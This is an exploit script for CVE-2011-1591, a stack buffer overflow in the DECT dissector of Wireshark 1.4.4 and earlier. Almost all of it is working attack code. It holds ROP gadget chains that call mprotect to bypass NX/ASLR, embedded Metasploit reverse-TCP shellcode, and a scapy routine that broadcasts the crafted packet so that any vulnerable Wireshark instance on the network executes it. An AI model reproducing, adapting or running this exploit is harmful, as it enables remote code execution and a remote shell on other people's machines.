Wireshark 1.4.4 DECT Dissector Buffer Overflow

`#!/usr/bin/env python  
# -*- coding: iso-8859-15 -*-  
  
a = """  
\n\t-- CVE: 2011-1591 : Wireshark <= 1.4.4 packet-dect.c dissect_dect() --\n  
#  
# -------- Team : Consortium-of-Pwners  
# -------- Author : ipv  
# -------- Impact : high  
# -------- Target : Archlinux wireshark-gtk-1.4.3-1-i686.pkg.tar.xz  
# -------- Description  
#  
# This code exploits a remote stack based buffer overflow in the DECT dissector of  
# wireshark. ROP chains aims to recover dynamically stack address, mprotect it and stack pivot to  
# shellcode located the payload.  
# All the process is automated, and bypass any NX/ALSR.  
#  
# Operating Systems tested : [see the summary] with scapy >= 2.5  
# For any comments, remarks, news, please mail me : ipv _at_ [team] . net  
###########################################################################\n"""  
  
  
import sys, struct  
if sys.version_info >= (2, 5):  
from scapy.all import *  
else:  
from scapy import *  
  
# align  
def _x(v):  
return struct.pack("<I", v)  
  
# Gadget Table - Arch linux v2010.05 default package  
# - wireshark-cli-1.4.3-1-i686.pkg.tar.xz   
# - wireshark-gtk-1.4.3-1-i686.pkg.tar.xz  
arch_rop_chain = [  
  
# Safe SEIP overwrite  
_x(0x8069acb), # pop ebx ; pop esi ; pop ebp  
_x(0), _x(0x80e9360), _x(0), # fake (arg1, arg2, arg3), to avoid crash  
  
# mprotect 1st arg : stack & 0xffff0000  
_x(0x8067d90), # push esp ; pop ebp  
_x(0x8081f2e), # xchg ebp eax  
_x(0x80f9d7f), # xchg ecx, eax  
_x(0x8061804), # pop eax  
_x(0xffff0000), #  
_x(0x80c69f0), # xchg edi, eax  
_x(0x80ff067), # and ecx edi ; dec ecx   
_x(0x8077c53), # inc ecx ; sub al 0x5d  
_x(0x8061804), # pop eax  
_x(0x7f16a5d0), # avoid crash with dec dword [ecx-0x76fbdb8c]  
_x(0x8048360), # xchg ecx eax  
_x(0x8089f46), # xchg edx eax ; std ; dec dword [ecx-0x76fbdb8c]  
_x(0x8067d90), # push esp ; pop ebp  
_x(0x8081f2e), # xchg ebp eax  
_x(0x8067d92)*7, # ret  
# 1st arg of mprotect is on esp+48 address (see below)  
_x(0x80745f9), # mov [eax+0x50] edx ; pop ebp  
_x(0),  
  
# we search address of mprotect (@mprotect = @fopen + 0x6fe70)  
_x(0x8065226), # pop eax  
_x(0x81aca20-0xc), # got[fopen]  
_x(0x8074597), # mov eax [eax+0xc]  
_x(0x8048360), # xchg ecx eax  
_x(0x8065226), # pop eax  
_x(0x6fe70),  
_x(0x8081f2e), # xchg ebp eax  
_x(0x806973d), # add ecx ebp  
_x(0x08104f61), # jmp *%ecx  
_x(0x0811eb63), # pop ebx, pop esi, pop edi  
# mprotect args (base_addr, page size, mode)  
_x(0), # Stack Map that is updated dynamically (see upper)  
_x(0x10000), # PAGE size 0x1000  
_x(0x7), # RWX Mode  
  
# now we can jump to our lower addressed shellcode by decreasing esp register  
_x(0x8061804), # pop eax  
_x(0xff+0x50), # esp will be decreased of 0xff + 0x50 bytes;  
_x(0x80b8fc8), # xchg edi eax  
_x(0x8067d90), # push esp ; pop ebp  
_x(0x80acc63), # sub ebp, edi ; dec ecx  
_x(0x8081f2e), # xchg ebp eax  
_x(0x0806979e) # jmp *eax  
]  
  
# Gadget Table - Bt4 compiled without SSP/FortifySource  
# Source wireshark 1.4.3  
labs_rop_chain = [  
  
# Safe SEIP overwrite  
_x(0x08073fa1), # pop ebx ; pop esi ; pop ebp  
_x(0), _x(0x0808c4d3), _x(0), # fake (arg1, arg2, arg3), to avoid crash  
  
# sys_mprotect : eax=125(0x7D) ; ebx=address base ; ecx = size page ; edx = mode  
# mprotect 3r d arg  
_x(0x080e64cf), # pop edx ; pop es ; add cl cl  
_x(0x7), _x(0x0), # RWX mode 0x7  
  
# mprotect 1st arg (logical AND with stack address to get address base),  
_x(0x080a1711), # mov edi esp ; dec ecx  
_x(0x0815b74f), # pop ecx  
_x(0xffff0000), #  
_x(0x0804c73c), # xchg ecx eax  
_x(0x080fadd7), # and edi eax ; dec ecx  
_x(0x0804c73c), # xchg ecx eax  
_x(0x080af344), # mov ebx edi ; dec ecx  
  
# mprotect 2nd arg  
_x(0x0815b74f), # pop ecx  
_x(0x10000), # PAGE size 0x10000  
  
# int 0x80 : here vdso is not randomized, so, we use it!  
_x(0x80d8b71), # pop eax  
_x(0x7D), # 0x7D = mprotect syscall  
_x(0x804e6df), # pop *esi  
_x(0xffffe411), # int 0x80  
  
# _x(0xffffe414), # @sysenter in .vdso  
_x(0x080ab949), # jmp *esi  
  
# now we can jump to our lower addressed shellcode by decreasing esp register  
_x(0x0815b74f), # pop ecx  
_x(256), # esp will be decreased of 256bytes  
_x(0x080a1711), # mov edi esp ; dec ecx  
_x(0x081087d3), # sub edi ecx ; dec ecx  
_x(0x080f7cb1) # jmp *edi  
]  
  
addr_os = {  
# ID # OS # STACK SIZE # GADGET TABLE  
1 : ["Arch Linux 2010.05 ", 0xb9, arch_rop_chain], # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz  
2 : ["Labs test ", 0xbf, labs_rop_chain],  
-1 : ["Debian 5.0.8 Lenny ", -3, False], # wireshark_1.0.2-3+lenny12_i386.deb  
-2 : ["Debian 6.0.2 Squeeze ", -1, False], # wireshark_1.2.11-6+squeeze1_i386.deb  
-3 : ["Fedora 14 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm  
-4 : ["OpenSuse 11.3 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm  
-5 : ["Ubuntu 10.10 | 11.04 ", -1, False], #  
-6 : ["Gentoo * ", -2, False] #  
}  
  
print a  
  
def usage():  
print "Please select and ID >= 0 :\n"  
print " ID TARGET INFO"  
print "--------------------------------------------------------------------"  
for i in addr_os.iteritems():  
print " %2d -- %s "%(i[0], i[1][0]),  
if i[1][1] == -1:  
print "Default package uses LibSSP & Fortify Source"  
elif i[1][1] == -2:  
print "Compiled/Build with Fortify Source"  
elif i[1][1] == -3:  
print "DECT protocol not supported"  
else:  
print "VULN -> Stack size %d"%(i[1][1])  
  
sys.exit(1)  
  
if len(sys.argv) == 1:  
usage()  
elif addr_os.has_key(int(sys.argv[1])) is False:  
usage()  
elif int(sys.argv[1]) < 0:  
usage()  
  
target = addr_os[int(sys.argv[1])]  
print "\n[+] Target : %s"%target[0]  
  
rop_chain = "".join([ rop for rop in target[2]])  
  
# msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 C  
rev_tcp_shell = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";  
  
  
SEIP_SMASH = target[1]  
print "\t[+] Length for smashing SEIP : 0x%x(%d)"%(SEIP_SMASH, SEIP_SMASH)  
  
nopsled = "\x90"  
head_nop = 50  
shellcode = nopsled * head_nop + rev_tcp_shell + nopsled * (SEIP_SMASH-len(rev_tcp_shell) - head_nop)  
payload = shellcode + rop_chain  
# stack alignment  
if (len(payload) % 2):  
diff = len(payload) % 2  
payload = payload[(2-diff):]  
  
print "\t[+] Payload length : %d"%len(payload)  
  
evil_packet = Ether(type=0x2323, dst="ff:ff:ff:ff:ff:ff") / payload  
# evil_packet.show()  
  
print "\t[+] Evil packet length : %d"%len(evil_packet)  
  
print "\t[+] Sending packet to broadcast"  
sendp(evil_packet)  
  
  
  
`